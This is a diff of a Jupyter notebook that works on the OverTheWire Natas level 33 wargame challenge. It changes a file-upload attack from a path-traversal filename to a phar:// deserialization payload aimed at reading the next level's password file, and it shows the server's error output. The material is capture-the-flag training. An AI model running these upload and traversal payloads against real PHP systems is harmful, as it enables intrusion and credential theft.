--- a/Natas/natas.ipynb
+++ b/Natas/natas.ipynb
@@ -24,16 +24,7 @@
    "cell_type": "code",
    "execution_count": 2,
    "metadata": {},
-   "outputs": [
-    {
-     "ename": "",
-     "evalue": "",
-     "output_type": "error",
-     "traceback": [
-      "\u001b[1;31mThe kernel failed to start as the Python Environment 'Python' is no longer available. Consider selecting another kernel or refreshing the list of Python Environments."
-     ]
-    }
-   ],
+   "outputs": [],
    "source": [
     "import requests\n",
     "import yaml\n",
@@ -1905,7 +1896,7 @@
   },
   {
    "cell_type": "code",
-   "execution_count": 36,
+   "execution_count": 7,
    "metadata": {},
    "outputs": [
     {
@@ -1915,14 +1906,14 @@
       "            <h2>Can you get it right?</h2>\n",
       "\n",
       "            <br />\n",
-      "<b>Warning</b>:  move_uploaded_file(/natas33/upload/../../var/www/natas/natas33/test.php): failed to open stream: Operation not permitted in <b>/var/www/natas/natas33/index.php</b> on line <b>27</b><br />\n",
+      "<b>Warning</b>:  move_uploaded_file(/natas33/upload/phar://natas33.phar): failed to open stream: No such file or directory in <b>/var/www/natas/natas33/index.php</b> on line <b>27</b><br />\n",
       "<br />\n",
-      "<b>Warning</b>:  move_uploaded_file(): Unable to move '/var/lib/php/uploadtmp/phplxSVMe' to '/natas33/upload/../../var/www/natas/natas33/test.php' in <b>/var/www/natas/natas33/index.php</b> on line <b>27</b><br />\n",
+      "<b>Warning</b>:  move_uploaded_file(): Unable to move '/var/lib/php/uploadtmp/phpxvrbhy' to '/natas33/upload/phar://natas33.phar' in <b>/var/www/natas/natas33/index.php</b> on line <b>27</b><br />\n",
       "There was an error uploading the file, please try again!<br><br />\n",
-      "<b>Warning</b>:  md5_file(../../var/www/natas/natas33/test.php): failed to open stream: No such file or directory in <b>/var/www/natas/natas33/index.php</b> on line <b>42</b><br />\n",
+      "<b>Warning</b>:  md5_file(phar://natas33.phar): failed to open stream: internal corruption of phar &quot;/natas33/upload/natas33.phar&quot; (truncated manifest header) in <b>/var/www/natas/natas33/index.php</b> on line <b>42</b><br />\n",
       "Failur! MD5sum mismatch!<br>            <form enctype=\"multipart/form-data\" action=\"index.php\" method=\"POST\">\n",
       "                <input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"4096\" />\n",
-      "                <input type=\"hidden\" name=\"filename\" value=\"rr5v952v9e5d8okc8mmp7hseko\" />\n",
+      "                <input type=\"hidden\" name=\"filename\" value=\"95m20ke1evjnv92oq7dvdaava4\" />\n",
       "                Upload Firmware Update:<br/>\n",
       "                <input name=\"uploadedfile\" type=\"file\" /><br />\n",
       "                <input type=\"submit\" value=\"Upload File\" />\n",
@@ -1943,9 +1934,9 @@
     "\n",
     "signature = \"adeafbadbabec0dedabada55ba55d00d\"\n",
     "\n",
-    "files = {\"uploadedfile\": open(\"natas33.php\", \"rb\")}\n",
+    "files = {\"uploadedfile\": open(\"natas33.phar\", \"rb\")}\n",
     "data = {\"filename\": \"/etc/natas_webpass/natas34\"}\n",
-    "data = {\"filename\": \"../../var/www/natas/natas33/test.php\"}\n",
+    "data = {\"filename\": \"phar://natas33.phar\"}\n",
     "res = requests.post(url, auth=auth, files=files, data=data)\n",
     "\n",
     "print(res.text[905:])\n"
